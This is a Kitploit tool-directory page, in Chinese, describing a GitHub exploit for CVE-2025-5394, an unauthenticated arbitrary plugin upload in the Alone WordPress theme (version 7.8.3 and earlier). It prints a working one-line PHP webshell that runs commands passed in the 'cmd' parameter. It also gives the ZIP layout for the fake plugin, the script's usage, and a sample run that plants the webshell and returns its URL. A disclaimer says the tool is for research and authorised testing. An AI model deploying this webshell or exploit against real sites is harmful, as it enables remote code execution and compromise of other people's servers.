Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-5394 — Alone – 慈善多功能非营利WordPress主题 <= 7.8.3 - 缺少授权,导致可通过插件安装进行未认证的任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-5394
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2025-5394

CVE-2025-5394

Alone – 慈善多功能非营利WordPress主题 <= 7.8.3 - 缺少授权,导致可通过插件安装进行未认证的任意文件上传

查看仓库
311年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 CVE-2025-5394 - Alone 主题中的未认证任意插件上传

📌 受影响产品:

Alone – 慈善多功能非营利 WordPress 主题
版本: <= 7.8.3
CVE: CVE-2025-5394
CVSS 评分: 9.8(严重)

🔥 漏洞摘要:

WordPress 的 Alone 主题存在任意文件上传漏洞,原因是在 alone_import_pack_install_plugin() 函数上缺少权限检查。
该缺陷允许未认证的攻击者从远程位置上传ZIP 文件(伪装成插件),从而可能实现远程代码执行。


⚙️ 利用脚本(Python)

本仓库包含一个 Python 脚本,可自动利用 CVE-2025-5394。
该脚本会触发易受攻击的 AJAX 操作,并将一个虚假插件(包含 WebShell)直接上传到 WordPress 服务器。


📁 WebShell 要求:

上传的 ZIP 文件必须遵循以下结构:

root@kitploit:~
shell_plugin.zip
└── shell_plugin
    └── shell_plugin.php

其中:

  • shell_plugin 是插件目录。
  • shell_plugin.php 是一个有效的 PHP 插件文件,带有插件头。
  • 该 PHP 文件可以包含 WebShell 的有效载荷。

shell_plugin.php 中最简插件头示例:

root@kitploit:~
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>

🚀 使用示例:

root@kitploit:~
python3 CVE-2025-5394.py -help
root@kitploit:~
usage: CVE-2025-5394.py [-h] -u URL -s SHELL

CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target WordPress site URL
  -s, --shell SHELL  ZIP file URL containing webshell (.zip)

✅ 成功输出:

root@kitploit:~
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target        : http://target.com/wordpress
[>] Shell URL     : http://target.com/shell.php
[>] Plugin Slug   : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL  : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php

⚠️ 免责声明:

本脚本仅用于教育和研究目的。
作者不承担因使用此代码而进行的任何滥用或非法活动的责任。
请仅在您拥有或获得明确测试许可的系统上使用它。


👨‍💻 作者:

Nxploited ( Khaled Alenazi )
GitHub: https://github.com/Nxploited

下载工具